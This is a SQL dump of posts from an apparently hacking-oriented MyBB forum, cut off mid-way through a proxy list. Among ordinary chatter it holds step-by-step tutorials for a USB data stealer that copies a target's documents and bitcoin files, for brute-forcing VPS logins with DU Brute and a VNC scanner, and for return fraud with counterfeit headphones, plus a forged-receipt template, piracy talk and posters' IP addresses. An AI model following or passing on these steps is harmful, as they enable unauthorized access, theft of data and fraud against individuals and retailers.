'92.23.230.99', '1545070179', '1', '0', '112', '1347880570', '1', '8a04cbd7445c06b3b588d2686110b8d1', '0', '1347880570'); INSERT INTO mybb_posts VALUES('2175', '428', '1942', '74', 'RE: Dark Steam | Free Steam Games', '0', '112', '??????Z', '1347840936', 'been a premium member with them about a year. \r\n\r\n1: no you cannot play on normal servers or online, you must play on cracked servers for any online games. \r\n2: if you like darksteam then it is really worth paying for a premium account because normal accounts have little amount of games you can dl.\r\n\r\ni only use it for single player games or games that i want to play just the missions of. i only ever pay for games if i want to play the multiplayer part of the game.\r\n\r\ngot any questions about it then you can pm me here or fine me on the darksteam website with the same username as here.', '92.23.230.99', '1545070179', '1', '0', '0', '0', '1', 'e037f1c811407c1daeafa6b53e97b052', '0', '0'); INSERT INTO mybb_posts VALUES('2176', '431', '2174', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '82', 'iTzIpod', '1347845009', '[quote=\'??????Z\' pid=\'2174\' dateline=\'1347839122\']\r\nLol ipod. \r\n\r\nSize: about the same size as yours Reloadzor\r\n Colour Scheme: silver, grey\r\n Render/Image: you choose, im not very creative :)\r\n Text: ??????Z\r\n\r\nCheers pal\r\n[/quote]\r\nWait. You didn\'t state what you wanted.\r\n\r\nAvatar\r\nSignature/Tag\r\nBanner\r\nEtc?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'feee71035880183aa3634e808ea5130a', '0', '0'); INSERT INTO mybb_posts VALUES('2177', '428', '2175', '74', 'RE: Dark Steam | Free Steam Games', '0', '82', 'iTzIpod', '1347845084', '[quote=\'??????Z\' pid=\'2175\' dateline=\'1347840936\']\r\nbeen a premium member with them about a year. \r\n\r\n1: no you cannot play on normal servers or online, you must play on cracked servers for any online games. \r\n2: if you like darksteam then it is really worth paying for a premium account because normal accounts have little amount of games you can dl.\r\n\r\ni only use it for single player games or games that i want to play just the missions of. i only ever pay for games if i want to play the multiplayer part of the game.\r\n\r\ngot any questions about it then you can pm me here or fine me on the darksteam website with the same username as here.\r\n[/quote]\r\n\r\n\r\nThanks for sharing your experience with Unique.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bdf6175fe5edcd585abf7aadc7427966', '0', '0'); INSERT INTO mybb_posts VALUES('2178', '437', '1995', '3', 'RE: Help keep LH up', '0', '20', 'JakeUS', '1347846131', 'I\'ll click on the links now.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'a559acdc52572b483925c70f5ba15d5e', '0', '0'); INSERT INTO mybb_posts VALUES('2179', '436', '1988', '7', 'RE: Motivation', '0', '20', 'JakeUS', '1347846255', 'I\'m on here everyday. Just not as active because of school.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '387e26472b217166034df243a6fe0931', '0', '0'); INSERT INTO mybb_posts VALUES('2180', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '1', 't3h jok3r', '1347848090', 'So when will NXK pick the new usebar, the like Reloazors latest userbar the most.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd398e40b120f58282f61d714d46c1ffd', '0', '0'); INSERT INTO mybb_posts VALUES('2181', '462', '0', '35', 'Vote for LHs new logo', '0', '1', 't3h jok3r', '1347848243', '[b]Number 1[/b]\r\n\r\n[img]http://i1107.photobucket.com/albums/h400/maxhax195/Attempt-2.png[/img]\r\n\r\n[b]Number 2[/b]\r\n\r\nhttps://www.dropbox.com/s/ok8bzkrx983wl0w/Edit.png\r\n\r\n[b]Number 3[/b]\r\n\r\nThe current one.\r\n\r\nIf you can make a better one or want to give it a try then post your logos below. Thanks for giving it a try.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '76a869b38bfeb572541c359d48358d2a', '0', '0'); INSERT INTO mybb_posts VALUES('2182', '446', '2133', '28', 'RE: This forum is dead..', '0', '1', 't3h jok3r', '1347848401', '[quote=\'Apathy\' pid=\'2133\' dateline=\'1347807770\']\r\nI agree. And technically weren\'t you the first active member joker and me second?\r\n[/quote]\r\n\r\nUhh **Got caught** No, because we are humans not robots so we can\'t be \"technically\" :cool:', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '40341cfa708728e3ed4b078722a8bf36', '0', '0'); INSERT INTO mybb_posts VALUES('2183', '451', '2125', '19', 'RE: [Recently Created]Free working shell booter', '0', '1', 't3h jok3r', '1347848946', '[quote=\'HoverCatz\' pid=\'2125\' dateline=\'1347797372\']\r\nExplain how i get it to work?\r\n[/quote]\r\n\r\nLmfao I OD LOL when I downloaded the program to check what\'s wrong with it and after I saw that it was blank I had to laugh at your comment. Checked the file and it\'s clean. Thread will be junked into a few hours.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '417507e785247d0e79c5097753ddab36', '0', '0'); INSERT INTO mybb_posts VALUES('2184', '437', '1995', '3', 'RE: Help keep LH up', '0', '7', 'Romdu62', '1347849519', 'Clicked on them for you. Good Luck', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '129126e26b162fb0e06151671606ce0e', '0', '0'); INSERT INTO mybb_posts VALUES('2185', '388', '1781', '52', 'RE: Request for the coders group', '0', '7', 'Romdu62', '1347849550', 'i did but didnt work. can you try?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '54a8a3aa7749fd0472c92216eae4763c', '0', '0'); INSERT INTO mybb_posts VALUES('2186', '463', '0', '20', '[VB.NET]Free Encrypters Algothrims Codes AER256 - OKTO3 & MORE...', '0', '7', 'Romdu62', '1347849885', 'Hi Evy1 ;)\r\n\r\nI\'ts me again i\'m Giving Some Encrypting alghotrims codes For Use On [u]VB.NET[/u] here are the list :\r\n\r\n\r\n[list][b]\r\n[*]AER256\r\n[*]ARMON64\r\n[*]ATOM128\r\n[*]BASE64\r\n[*]ESBA\r\n[*]eZIP64\r\n[*]FERON74\r\n[*]GILA7\r\n[*]HAZZ15\r\n[*]MEGAN35\r\n[*]OKTO3\r\n[*]TIGO3FX\r\n[*]TRIPO5\r\n[*]ZARA128\r\n[*]ZONG22[/b]\r\n[/list]\r\n[color=#FF0000][u]Screenshot:[/u][/color]\r\n[spoiler][img]http://img844.imageshack.us/img844/6605/69b186e2124640cf9fc2a1a.png[/img][/spoiler]\r\n\r\n\r\n[color=#FF0000][u]Download : [/u][/color]\r\n[url=http://fileshub.in/download.php?file=264Encrypters.rar]Click Here To download[/url]\r\n\r\nCredits: Sidodz', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '50549bdf8512d9e24f122fd17c7d6fd7', '0', '0'); INSERT INTO mybb_posts VALUES('2187', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '2', 'Apathy', '1347849987', 'Second last from bottom.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', 'a8a9fa48c060f2311e4603fa28e1c32f', '0', '0'); INSERT INTO mybb_posts VALUES('2188', '443', '2155', '42', 'RE: Apple Announces the iPhone 5', '0', '7', 'Romdu62', '1347849996', '[quote=\'MistaCode\' pid=\'2155\' dateline=\'1347816171\']\r\n[quote=\'iTzIpod\' pid=\'2101\' dateline=\'1347743858\']\r\nI know right?\r\nThat\'s really expensive...\r\n[/quote]\r\n\r\n200$ for iPhone? That\'s called Cheap for iPhone. As iPhone 4S was 500$, and that\'s called expensive.\r\n[/quote]\r\n\r\nWelcome back mistacode lol.\r\n\r\nI find $200 for an iphone cheap to.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1318db48433d81935041f21e8e4365cd', '0', '0'); INSERT INTO mybb_posts VALUES('2368', '465', '2194', '11', 'RE: What is ewhoring', '0', '82', 'iTzIpod', '1348107034', 'All of the E-Whoring details can be found [url=http://l33thacking.net/thread-26.html] here[/url]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '710fc334a3e6d97a18723e4298a6d984', '0', '0'); INSERT INTO mybb_posts VALUES('2190', '435', '1984', '4', 'RE: Newbie Here', '0', '188', 'Lonnie', '1347851162', 'Thank you guys for the welcoming!', '24.0.108.10', '402680842', '0', '0', '0', '0', '1', '64b7a09970d3df114348a7e156aa0cf3', '0', '0'); INSERT INTO mybb_posts VALUES('2191', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '61', 'NXK', '1347851351', 'When I find something I like, I still feel like it\'s plain. Like don\'t get me wrong it\'s amazing it\'s just not something i\'m looking for.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'ad58f70478e98b8980ba4b8ef4777858', '0', '0'); INSERT INTO mybb_posts VALUES('2192', '464', '0', '12', '[TUT] FUD USB Stealer by Anonymous Hackers', '0', '10', 'swa4567', '1347851698', 'Here is a simple method to grab all the data on a targets computer if you have access to it, by simply plugging in a USB disc. This will allow you to grab:\r\n-All Data\r\n-Pictures/ Videos\r\n-Documents\r\n-Bitcoin\r\n-Etc.\r\n\r\nSo lets get started!\r\n\r\n[color=#1E90FF]1.[/color] [color=#32CD32][b][u]Download file from this link.[/u][/b][/color]\r\nhttp://nightarrowforensics.com/\r\n\r\n[color=#FF0000][u][b]Virus Scan:[/b][/u][/color]\r\nhttp://vscan.novirusthanks.org/analysis/ab780ca63da72a8482ad40299a4fe083/bmlnaHRhcnJvdzItMC16aXA=/\r\n\r\nhttp://www.metascan-online.com/results/hu51m9ea9rsyprd4la8c9ddcek2urnl1\r\n[color=#FFD700]\r\n[b]Select the download tab on the top area of the page.[/b][/color]\r\n[IMG]http://i46.tinypic.com/20nrid.jpg[/IMG]\r\n[color=#FFD700]\r\n[b]Select the first choice for download \"Current Version.\"[/b][/color]\r\n[IMG]http://i47.tinypic.com/34fcsas.png[/IMG]\r\n[color=#FFD700]\r\n[b][color=#1E90FF]2.[/color] Once downloaded open using Winzip and take the setup.bat file and simply drag and drop it to the desired USB drive you want to use. [/b][/color]\r\n[IMG]http://i49.tinypic.com/wttw2d.png[/IMG]\r\n[IMG]http://i47.tinypic.com/50668h.png[/IMG]\r\n\r\n[color=#FFD700][b][color=#1E90FF]3.[/color] Remove the USB drive and insert it in the targets computer and run the setup.bat file and that\'s it. Below is Proof/Example.[/b][/color]\r\n[IMG]http://i50.tinypic.com/25aj43q.png[/IMG]\r\n\r\n[color=#FFD700][b]This is how all the Data will look & be stored once completed.[/b][/color]\r\n[IMG]http://i47.tinypic.com/317cvas.png[/IMG]\r\n\r\n\r\nMade By: [color=#1E90FF]TheAnonLegion99[/color]\r\n\r\n[b]We Are Anonymous\r\nWe Are Legion\r\nWe Do Not Forgive\r\nWe Do not Forget\r\nExpect Us[/b]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '323fdd6991dfdc8adf4981c067b16ec7', '0', '0'); INSERT INTO mybb_posts VALUES('2193', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '10', 'swa4567', '1347851802', 'Wow i didn\'t no that. Thanks for telling us', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '6c4751f91e9dd62c48d665248efab057', '0', '0'); INSERT INTO mybb_posts VALUES('2194', '465', '0', '11', 'What is ewhoring', '0', '10', 'swa4567', '1347851832', 'What is ewhoring. I don\'t get it is it porn?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4ce5f0ec0bad35f365be6b11f958933b', '0', '0'); INSERT INTO mybb_posts VALUES('2195', '449', '2122', '35', 'RE: Kratos God Of War Signature/Tag', '0', '82', 'iTzIpod', '1347851857', '[quote=\'R?????zo?\' pid=\'2122\' dateline=\'1347795298\']\r\nLooks awesome, did you made it yourself?\r\nI would rate 9/10, would look perfect with a fading border.\r\n[/quote]\r\n\r\nYeah. I made it myself. I might add a fading border. But how do I do that?\r\n\r\n\r\nDo I add a border and lower the opacity or something?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9035217e60f71b19e3517acb9edd05ea', '0', '0'); INSERT INTO mybb_posts VALUES('2196', '403', '1883', '18', 'RE: Youtube Bot', '0', '10', 'swa4567', '1347851956', 'Can you post a screenshot please', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f0a803d9e8faedb2aff0fe9edcf2ede7', '0', '0'); INSERT INTO mybb_posts VALUES('2197', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '10', 'swa4567', '1347851990', 'What are the requirements?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '7db745761739905cdd4beea762b8be87', '0', '0'); INSERT INTO mybb_posts VALUES('2198', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '82', 'iTzIpod', '1347852424', ':/ I can\'t view the 2nd one since I\'m on Mobile. But for now, my vote goes to the 1st logo.\r\n\r\nI would like to see Reloadzor try out for this though! :D Good luck everyone.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f767f2ba1d4a75e8929340629127b5b1', '0', '0'); INSERT INTO mybb_posts VALUES('2284', '451', '2111', '19', '[Junk][Recently Created]Free working shell booter', '0', '1', 't3h jok3r', '1347936326', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('2285', '388', '1781', '52', 'RE: Request for the coders group', '0', '7', 'Romdu62', '1347936396', 'ok can you tell me how to use this program properly?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a01d7a9eb80f7f43e15a6e8e57662ba1', '0', '0'); INSERT INTO mybb_posts VALUES('2286', '470', '2211', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '7', 'Romdu62', '1347936482', 'thanks for the list but too long.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'd39d90566736adf9cbc760a0159b3291', '0', '0'); INSERT INTO mybb_posts VALUES('2200', '438', '2012', '13', 'RE: Stay Anonymous (Secure) online 2012 Using SSH Tunneling', '0', '5', 'Timmy', '1347852970', 'I heard a lot TOR browser. Is it really that good?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '20380918fd700c1976fa5acfed1eb6f7', '0', '0'); INSERT INTO mybb_posts VALUES('2201', '466', '0', '13', 'How to BruteForce a VPS!', '0', '5', 'Timmy', '1347853035', '[align=center][color=#32CD32][size=large] How to BruteForce a VPS! [/align] [/size][/color]\n\n\n[size=medium] \n\n[color=#FF4500] [size=xx-large] 1) [/size] [/color]Alright first off your going to need to download DU Brute, And VNC Scanner. \nLink: [/size] [url=http://www.mediafire.com/?5kfe8qg0s7qazsl]CLICK ME![/url]\n\n[size=medium] [color=#FF4500] [size=xx-large] 2) [/size] [/color] After you have those downloaded your going to have to go into the \nVNC Scanner folder and open \"vnc_scanner_gui.exe\" Its the one all the way at the bottom. Once you have that opened it should look like this\n\n[img]http://i.imgur.com/DmjVP.png[/img]\n\n[color=#FF4500] [size=xx-large] 3) [/size] [/color]Now your going to need to go to get some proxies.\nAfter you have some, just copy the proxies and paste them in the VNC Scanner. Then press \"Start Scan\"\n\n[img]http://i.imgur.com/eJjha.png[/img]\n\n\n[color=#FF4500] [size=xx-large] 4) [/size] [/color] Once you have clicked \"Start Scan\" a cmd window will come up and just let it do its thing. After its done you should see the \"Start Scan\" Button fading in and out. When you see it fading in and out, You have to press \"Save List\" and save it to desktop.\n\n[color=#FF4500] [size=xx-large] 4) [/size] [/color] Now open the DU Brute folder and open DU Brute.exe. Once you have opened it click \"Generation\"\n\n\n[img]http://i.imgur.com/uAwaV.png[/img]\n\n\n[color=#FF4500] [size=xx-large] 5) [/size] [/color] Once you have clicked Generation, click \"File IP\" and pick the IP list you saved to your desktop. Then click on \"File Login\" and go to the DUBrute folder and click on \"usernames\" Now after you have that done go to \"File Pass\" and open the \"Passwords\" Folder that is in the DUBrute folder, And pick one of the password lists.\n\n\n[img]http://i.imgur.com/4fk6P.png[/img]\n\n\n[color=#FF4500] [size=xx-large] 6) [/size] [/color] After you have done that, Press \"Make\" and then it should be finished pretty fast then press \"Ok\" in the new windows that pops up.\n\nNow just exit out of \"Generation\" and press \"start\" on DU Brute.\n\n\n[img]http://i.imgur.com/4fk6P.png[/img]\n\n \n[color=#FF4500] [size=xx-large] 7) [/size] [/color] [/size] [size=medium] Then this is the long part, You just need to wait for it to do its thing. This may take a shitwhile but at the end you could have a list of VPS logins.[/size]\n\nCredits: [url=http://l33thacking.net/user-214.html]Kasual[/url]', '72.231.24.165', '1223104677', '1', '0', '5', '1349233240', '1', 'a060a78da65b24ac921ac1d985983bab', '0', '1349233240'); INSERT INTO mybb_posts VALUES('2202', '345', '2191', '63', 'RE: Need userbar! [Gamers]', '0', '5', 'Timmy', '1347853148', '[quote=\'NXK\' pid=\'2191\' dateline=\'1347851351\']\r\nWhen I find something I like, I still feel like it\'s plain. Like don\'t get me wrong it\'s amazing it\'s just not something i\'m looking for.\r\n[/quote]\r\nTo be honest, you won\'t get any professional work done with like 2 novice GFX experts on a new forum unless you get paid work from outside of LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1dcbbbfdee6d96d15ab94b0685807ef0', '0', '0'); INSERT INTO mybb_posts VALUES('2203', '467', '0', '44', 'Bestbuy PSD', '0', '5', 'Timmy', '1347853327', 'Free BestBuy Receipt Photoshop Draft copy.\r\n\r\nDownload: http://www.mediafire.com/?coxye46s35ud9y6', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '01d12cfe47a6450787e9979ebc53d312', '0', '0'); INSERT INTO mybb_posts VALUES('2204', '468', '0', '16', '[TUT] Free Dre Beats [Unconfirmed]', '0', '5', 'Timmy', '1347853534', '[color=#FF0000]1. You will have to buy some fake Dr. Dre Beats before you could do this. They are cheap and you will make your money back. The best places to get these are websites like TradeTang.com, DealXtreme.com, and DHGate.com. There are many more like this, make a Google search for \"Chinese wholesale\" and you\'ll find some good sites. You could also search \"replica Dr. Dre Beats\" They will be no more then $50 and no less than $15.[/color]\r\n\r\n[color=#1E90FF]2. After you get your fake Dr. Dre Beats, make sure they look real. If they look like shit, then just return them and find more fake ones.[/color]\r\n\r\n[color=#FFD700]3. Go to a retailer that carries Beats, make sure you check first or else you\'ll look stupid. No matter what you do, don\'t choose Best Buy. The best bet is Walmart, there employees are stupid and don\'t care.[/color]\r\n\r\n4. When you have picked your retailer, head on over there and tell them that you bought these for your brother as a gift and he doesn\'t have an iPod or listen to music so he doesn\'t need them. They will ask for a receipt, tell them that you don\'t have one. Most likely you will get store credit, say alright and go buy something you like, maybe real Beats!\r\n\r\n[color=#800000]Enjoy! Unconfirmed because I never tried it cuz I have dre beats already. Please use a VPN or call with Skype through [/color][url=http://l33thacking.net/thread-77.html]clownfish[/url].', '72.231.24.165', '1223104677', '1', '0', '5', '1347854100', '1', '4ca914b388ab8398350ef5281d43d18d', '0', '1347854100'); INSERT INTO mybb_posts VALUES('2205', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1347854204', '/me is trying to help LH get more active.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b693c33031543bd29be613b9a8635ed9', '0', '0'); INSERT INTO mybb_posts VALUES('2206', '345', '2202', '63', 'RE: Need userbar! [Gamers]', '0', '61', 'NXK', '1347854254', '[quote=\'Timmy\' pid=\'2202\' dateline=\'1347853148\']\r\n[quote=\'NXK\' pid=\'2191\' dateline=\'1347851351\']\r\nWhen I find something I like, I still feel like it\'s plain. Like don\'t get me wrong it\'s amazing it\'s just not something i\'m looking for.\r\n[/quote]\r\nTo be honest, you won\'t get any professional work done with like 2 novice GFX experts on a new forum unless you get paid work from outside of LH.\r\n[/quote]\r\nOkay? your post has nothing to do with the fact that I think it\'s plain..\r\n\r\nI never said it was bad. Learn to read the posts please.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'ac2ae5d276f07b3abc0ab0a8552635d3', '0', '0'); INSERT INTO mybb_posts VALUES('2207', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1347854296', 'Banned for banning the one who likes banning.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b77b1b93242b26b4c283aaf8ba2cc69c', '0', '0'); INSERT INTO mybb_posts VALUES('2208', '435', '1984', '4', 'RE: Newbie Here', '0', '1', 't3h jok3r', '1347854389', 'No problem. Hope you are HQ and enjoy LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f8bf7731834ce0697337f6d7e49ce28a', '0', '0'); INSERT INTO mybb_posts VALUES('2209', '345', '2206', '63', 'RE: Need userbar! [Gamers]', '0', '5', 'Timmy', '1347854709', '[quote=\'NXK\' pid=\'2206\' dateline=\'1347854254\']\r\n[quote=\'Timmy\' pid=\'2202\' dateline=\'1347853148\']\r\n[quote=\'NXK\' pid=\'2191\' dateline=\'1347851351\']\r\nWhen I find something I like, I still feel like it\'s plain. Like don\'t get me wrong it\'s amazing it\'s just not something i\'m looking for.\r\n[/quote]\r\nTo be honest, you won\'t get any professional work done with like 2 novice GFX experts on a new forum unless you get paid work from outside of LH.\r\n[/quote]\r\nOkay? your post has nothing to do with the fact that I think it\'s plain..\r\n\r\nI never said it was bad. Learn to read the posts please.\r\n[/quote]\r\n\r\nWhat i mean is that for now pick any good userbar then in future you can expect a better one because then we would have more graphic designers.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cdf93ad31bdacf2bbedbaa8c93a61bde', '0', '0'); INSERT INTO mybb_posts VALUES('2210', '469', '0', '3', '[Announcement]Going to clear up all the PMs on board', '0', '1', 't3h jok3r', '1347856289', 'I will clear all PMs on board today(9/17/12), because we need some space. It\'s not like we need more space or the site is going to slow down, but I\'m doing it just incase. I will be deleting all PMs in the INBOX. If you have any important PMs then please move it to any folder exempt inbox.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6b6d0b257102cf34f08ad89bd3c29851', '0', '0'); INSERT INTO mybb_posts VALUES('2211', '470', '0', '14', '[SHITLOAD][FRESH]Free proxy list', '0', '4', 'Triple H', '1347856939', '16-09-12 | Free Proxy Server List\r\n\r\n\r\n[code]\r\n1.36.21.178:3128\r\n103.3.221.154:8080\r\n103.3.221.153:8080\r\n103.247.23.26:8080\r\n109.106.192.124:3128\r\n110.137.47.23:8080\r\n110.139.183.88:8080\r\n111.68.97.178:8080\r\n112.133.201.67:3128\r\n112.125.42.20:10080\r\n113.105.181.77:3128\r\n113.106.194.222:82\r\n113.207.124.165:8080\r\n114.134.75.82:3128\r\n114.80.130.220:13992\r\n114.35.167.38:8080\r\n114.80.130.220:17946\r\n114.80.130.220:8000\r\n114.80.130.220:25782\r\n114.80.130.220:8080\r\n114.80.130.220:8888\r\n114.80.130.221:8001\r\n114.80.130.221:8081\r\n114.80.130.221:8085\r\n114.80.130.221:8090\r\n114.80.130.221:8118\r\n114.80.130.221:8888\r\n115.124.0.68:443\r\n115.124.0.68:80\r\n114.80.130.220:8001\r\n114.80.130.220:8081\r\n114.80.130.220:8090\r\n114.80.130.221:8000\r\n114.80.130.221:8080\r\n114.80.130.220:8085\r\n114.80.130.220:8118\r\n114.80.130.220:8909\r\n114.80.130.221:8909\r\n117.218.37.18:3128\r\n118.174.133.14:3128\r\n118.142.35.126:3128\r\n118.186.9.21:80\r\n118.96.231.62:3128\r\n118.96.251.234:8080\r\n118.96.127.10:3128\r\n118.96.151.221:3128\r\n118.96.230.118:8080\r\n118.97.47.35:3128\r\n118.97.44.154:3128\r\n118.97.210.75:3128\r\n119.30.112.212:8080\r\n119.46.68.228:443\r\n119.18.145.147:8087\r\n119.46.68.228:80\r\n119.46.68.232:443\r\n119.46.68.232:80\r\n119.235.253.152:3128\r\n121.15.167.231:8080\r\n121.18.231.102:54321\r\n121.18.231.98:31281\r\n119.254.90.18:8080\r\n121.101.211.31:3128\r\n119.32.229.40:8909\r\n121.18.231.102:19279\r\n119.46.90.28:80\r\n122.113.28.52:3128\r\n122.155.12.151:3128\r\n122.3.237.161:3128\r\n122.56.15.70:80\r\n122.72.124.2:80\r\n122.72.124.31:80\r\n122.72.80.106:80\r\n122.72.80.108:80\r\n122.72.80.101:80\r\n123.125.116.243:6675\r\n123.136.71.152:80\r\n123.136.71.154:80\r\n123.136.71.156:80\r\n123.108.249.186:80\r\n123.108.249.186:8080\r\n124.158.18.230:443\r\n124.158.18.230:80\r\n124.207.162.119:80\r\n124.158.9.32:3128\r\n124.207.162.190:80\r\n124.207.162.118:80\r\n125.39.93.69:8888\r\n125.76.237.68:80\r\n125.39.93.68:8888\r\n14.139.230.114:3128\r\n133.26.102.121:80\r\n125.165.50.254:8080\r\n128.91.49.131:3128\r\n173.15.194.228:3128\r\n146.255.9.124:3128\r\n173.219.189.95:3128\r\n175.41.132.160:80\r\n174.69.244.60:8080\r\n176.31.107.35:3128\r\n173.236.204.117:8080\r\n177.103.215.233:3128\r\n177.103.139.64:3128\r\n177.103.229.35:80\r\n178.157.62.242:80\r\n177.64.155.216:8080\r\n178.157.59.106:3128\r\n178.63.84.146:3128\r\n180.183.66.177:3128\r\n180.244.223.223:3128\r\n180.247.198.155:3128\r\n183.89.17.221:3128\r\n186.237.16.196:80\r\n186.92.227.113:8080\r\n187.44.1.171:8080\r\n189.51.5.218:3128\r\n189.8.69.36:80\r\n189.26.236.87:3128\r\n189.8.69.39:443\r\n189.39.120.4:3128\r\n189.8.69.39:80\r\n189.84.112.118:3128\r\n190.137.44.81:8080\r\n190.146.1.162:3128\r\n190.203.11.41:8080\r\n190.66.1.39:8080\r\n190.85.37.90:3128\r\n190.85.37.90:8080\r\n193.89.116.105:443\r\n193.89.116.105:80\r\n193.89.116.106:443\r\n193.89.116.106:80\r\n193.89.116.107:443\r\n193.89.116.107:80\r\n190.79.253.98:8080\r\n190.79.66.27:8080\r\n193.116.157.195:80\r\n200.14.41.24:3128\r\n200.14.46.105:3128\r\n195.158.108.84:3128\r\n200.146.104.121:3128\r\n200.182.173.202:3128\r\n200.54.92.187:3128\r\n200.48.39.22:3128\r\n200.54.92.187:80\r\n200.94.17.249:3128\r\n200.94.17.249:8080\r\n200.249.144.86:6588\r\n201.148.26.81:8080\r\n201.116.187.236:3128\r\n200.71.204.150:80\r\n201.244.71.62:3128\r\n201.236.80.197:3128\r\n202.106.16.116:3128\r\n202.106.16.20:3128\r\n202.106.16.36:3128\r\n202.106.16.68:3128\r\n202.109.123.180:80\r\n202.112.114.17:3128\r\n201.39.174.82:3128\r\n202.127.28.67:3128\r\n202.162.198.178:8000\r\n202.29.97.5:3128\r\n202.3.247.118:80\r\n202.143.146.199:8080\r\n202.182.54.156:80\r\n202.57.4.124:8089\r\n202.66.128.126:3128\r\n202.62.98.242:8080\r\n202.182.54.158:80\r\n202.71.99.222:80\r\n202.91.81.116:8080\r\n202.75.217.156:80\r\n202.37.120.234:8080\r\n202.90.128.162:3128\r\n202.71.99.222:8080\r\n202.98.123.126:8080\r\n203.114.112.101:3128\r\n203.172.188.34:80\r\n203.189.89.153:8080\r\n203.20.238.21:80\r\n203.20.55.55:443\r\n203.20.55.55:80\r\n202.94.84.202:3128\r\n203.20.55.57:443\r\n203.20.55.57:80\r\n202.96.136.169:3128\r\n203.93.28.166:8080\r\n203.77.246.60:3128\r\n209.51.184.3:80\r\n209.51.184.6:443\r\n209.51.184.6:80\r\n210.101.131.231:8080\r\n210.13.71.73:80\r\n210.13.71.76:80\r\n202.95.155.55:3128\r\n210.13.71.77:80\r\n203.77.232.99:8080\r\n203.93.104.20:80\r\n209.62.12.130:8118\r\n210.19.83.200:80\r\n210.19.83.197:80\r\n210.19.83.202:80\r\n210.101.131.232:8080\r\n210.76.127.35:3128\r\n210.211.109.244:8081\r\n206.17.82.114:80\r\n208.51.184.58:3128\r\n211.136.10.24:80\r\n211.136.10.25:80\r\n211.136.10.29:80\r\n211.136.10.30:80\r\n210.75.120.3:80\r\n211.142.236.132:81\r\n211.142.236.136:80\r\n210.22.13.104:80\r\n211.100.61.202:3128\r\n211.161.152.100:80\r\n211.100.49.9:3128\r\n211.162.121.182:80\r\n211.162.121.183:80\r\n211.161.152.107:80\r\n211.144.76.58:9000\r\n212.33.245.235:3128\r\n213.186.122.123:3128\r\n213.42.124.107:80\r\n211.94.93.224:3128\r\n212.93.195.229:3128\r\n217.219.129.20:80\r\n217.219.129.20:3128\r\n218.108.242.108:3128\r\n218.16.145.109:8080\r\n218.152.121.184:8080\r\n218.241.153.43:8080\r\n218.247.129.2:80\r\n218.247.138.40:80\r\n218.76.140.62:3128\r\n218.63.168.253:3128\r\n218.84.126.82:3128\r\n218.26.251.168:1337\r\n218.29.54.105:80\r\n218.5.74.199:3128\r\n219.230.71.82:3128\r\n219.234.82.62:6666\r\n219.234.82.62:8001\r\n219.234.82.62:8000\r\n219.234.82.62:8081\r\n219.234.82.62:8085\r\n219.133.36.198:80\r\n218.94.1.166:82\r\n219.234.82.62:8888\r\n219.234.82.76:8909\r\n219.234.82.62:8909\r\n219.234.82.78:6666\r\n219.234.82.78:14128\r\n219.130.39.9:3128\r\n219.234.82.78:80\r\n219.234.82.78:8001\r\n219.234.82.78:8080\r\n219.234.82.78:8081\r\n219.234.82.78:8085\r\n219.234.82.62:8080\r\n219.234.82.78:81\r\n219.234.82.78:82\r\n219.234.82.78:8090\r\n219.234.82.78:83\r\n219.234.82.78:84\r\n219.234.82.62:8090\r\n219.92.6.245:3128\r\n220.225.4.250:8080\r\n220.113.5.198:8080\r\n219.94.243.100:8080\r\n220.195.192.172:80\r\n221.2.228.202:8000\r\n221.2.174.164:8082\r\n221.214.218.148:3128\r\n221.229.255.50:3128\r\n220.181.55.11:80\r\n222.124.178.98:3128\r\n222.127.106.89:3128\r\n222.134.74.30:8080\r\n222.197.181.5:3128\r\n222.74.212.66:808\r\n222.92.116.10:80\r\n223.19.187.227:3128\r\n222.74.98.234:8080\r\n23.20.161.66:80\r\n223.202.8.69:3128\r\n41.189.36.26:3128\r\n223.27.80.35:8080\r\n41.222.209.77:8080\r\n41.223.56.140:80\r\n37.59.130.31:80\r\n41.215.122.65:8080\r\n41.75.201.146:3128\r\n41.89.130.2:3128\r\n41.72.2